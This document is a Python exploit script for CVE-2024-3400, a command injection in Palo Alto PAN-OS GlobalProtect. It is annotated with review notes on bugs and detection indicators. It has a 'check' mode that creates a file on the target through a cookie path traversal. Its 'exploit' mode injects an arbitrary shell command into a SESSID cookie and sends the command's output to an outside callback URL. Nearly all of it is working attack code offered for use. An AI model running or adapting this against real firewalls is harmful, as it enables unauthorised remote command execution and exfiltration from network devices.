
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation - CVE-2024-3400

Apr 22nd, 2024
  1. # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
  2. # Date: 21 Apr 2024
  3. # Exploit Author: Kr0ff
  4. # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
  5. # Software Link: -
  6. # Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
  7. #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
  8. #          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
  9. # Tested on: Debian
  10. # CVE : CVE-2024-3400
  11.  
  12. #!/usr/bin/env python3
  13.  
  14. import sys
  15.  
  16. try:
  17.     import argparse
  18.     import requests
  19. except ImportError:
  20.     print("Missing dependencies, either requests or argparse not installed")
  21.     sys.exit(2)
  22.  
  23. # https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
  24. # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  25.  
def check_vuln(target: str, file: str) -> bool:
    """Probe *target* for CVE-2024-3400 and return True when it looks vulnerable.

    The probe POSTs to the GlobalProtect HIP-report endpoint with a SESSID
    cookie whose value is a path-traversal sequence ending in *file*, then
    GETs ``/global-protect/portal/images/<file>`` without the cookie. A 403
    on that GET is treated as the signal that the file now exists on the
    device (per the page title, "Arbitrary File Creation") -- so this is not
    a passive check: it writes to the target. Progress is printed to stdout.

    Args:
        target: Hostname, or URL including scheme, of the GlobalProtect portal.
        file: File name appended to the traversal path in the SESSID cookie.

    Returns:
        True only when the POST answered 200 and the follow-up GET answered 403;
        False otherwise.

    Raises:
        SystemExit: via ``sys.exit(1)`` when the HTTPS attempt times out.
        requests.ConnectionError: is *not* caught (see note at the except clauses).
    """
    ret = False

    # GlobalProtect endpoint targeted by the POST below.
    uri = "/ssl-vpn/hipreport.esp"

    s = requests.Session()
    r = ""

    # Detection note: the indicator is a POST to /ssl-vpn/hipreport.esp whose
    # SESSID cookie carries "../" traversal segments; the User-Agent is a fixed
    # desktop-Chrome string. (Do not insert comments inside the dict: the
    # backslash continuations would swallow them.)
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    }

    # Same User-Agent, no cookie: used for the follow-up GET that confirms
    # the file was created.
    headers_noCookie = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }

    # NOTE(review): `not "http://"` is always False (non-empty literal), so
    # this branch is taken whenever "https://" is absent from target -- even
    # when target already starts with "http://", which then receives a
    # second scheme prefix below.
    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            # verify=False disables TLS certificate validation for the request.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # NOTE(review): `A or B` evaluates to A here, so only Timeout is caught;
        # a ConnectionError propagates to the caller.
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        # Prepends "https://" to the value that already got "http://" above.
        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # Same `or` caveat as above: only Timeout reaches this handler.
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    # A 200 on the POST alone is not treated as proof; the script then asks
    # for the file it tried to create and reads a 403 as "exists but not
    # served" -- presumably the tell-tale for a successful write (TODO confirm
    # against the referenced analyses).
    if r.status_code == 200:
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        # Equivalent to falling through: ret is still False here.
        return ret

    return ret
  74.    
  75.    
  76.  
def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    """Send the CVE-2024-3400 injection request and report whether it was accepted.

    Builds a SESSID cookie that traverses into the device-telemetry path and
    embeds *callback_url* and *payload* inside a backtick command substitution
    (the injection point described by the references above), then POSTs it to
    the HIP-report endpoint. The result is judged solely on whether the HTTP
    response body contains the word "Success"; the script never sees the
    command output itself -- that is expected to arrive at *callback_url*.

    Args:
        target: Hostname, or URL including scheme, of the GlobalProtect portal.
        callback_url: URL the injected command is meant to reach out to.
        payload: Shell command text placed verbatim into the cookie.

    Returns:
        True when "Success" appears in the response body, False otherwise.

    Raises:
        SystemExit: via ``sys.exit(1)`` when the HTTPS attempt times out.
        requests.ConnectionError: is *not* caught (see note at the except clauses).
    """
    ret = False
    p = ""

    # NOTE(review): `p` is assigned here but never read again; the raw
    # `payload` is what ends up in the Cookie header below.
    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    # GlobalProtect endpoint targeted by the POST below.
    uri = "/ssl-vpn/hipreport.esp"

    # Detection note: the indicator is a POST to /ssl-vpn/hipreport.esp whose
    # SESSID cookie traverses into /opt/panlogs/tmp/device_telemetry/ and
    # contains a backtick-delimited file-name component. (Do not insert
    # comments inside the dict: the backslash continuations would swallow them.)
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"

            }

    s = requests.Session()
    r = ""

    # NOTE(review): `not "http://"` is always False (non-empty literal), so
    # this branch is taken whenever "https://" is absent from target -- even
    # when target already starts with "http://", which then receives a
    # second scheme prefix below. Same logic as in check_vuln.
    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            # verify=False disables TLS certificate validation for the request.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # NOTE(review): `A or B` evaluates to A here, so only Timeout is caught;
        # a ConnectionError propagates to the caller.
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        # Prepends "https://" to the value that already got "http://" above.
        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # Same `or` caveat as above: only Timeout reaches this handler.
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    # Only the literal substring "Success" in the body is checked; no status
    # code or callback confirmation is consulted.
    if not "Success" in r.text:
        return ret

    else:
        ret = True

    return ret
  123.  
# Initialize parser for arguments
def argparser(selection: list[str] | None = None) -> None:
    """Parse the command line and dispatch to the ``exploit`` or ``check`` module.

    Two sub-commands are defined: ``exploit`` (needs -t/--target, -p/--payload,
    -c/--callbackurl) and ``check`` (needs -t/--target, -f/--filename). The
    chosen module's function is called for its side effects; its boolean
    result is discarded.

    Args:
        selection: Argument list to parse in place of ``sys.argv``. NOTE(review):
            the result of parsing it is immediately overwritten by a second
            ``parse_args`` call on the real ``sys.argv``, so this parameter has
            no effect.

    Returns:
        None.

    Raises:
        SystemExit: from argparse on usage errors or when no arguments are
            given (the ``-h`` fallback prints help and exits).
    """
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )

    # dest="module" exposes the selected sub-command name as args.module.
    subparser = parser.add_subparsers( help="Available modules", dest="module")

    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    # First parse honours `selection`; the second parse discards that result
    # and re-reads sys.argv, showing help when the script was run with no args.
    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])

    # Return values of cmdexec/check_vuln are not used; both report via print.
    if args.module == "exploit":
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)
  147.  
# Script entry point: parse the CLI and run the chosen module. "Finished !"
# is printed regardless of outcome, since argparser() returns nothing and
# any failure path inside it exits via sys.exit or an uncaught exception.
if __name__ == "__main__":
    argparser()
    print("Finished !")
  151.            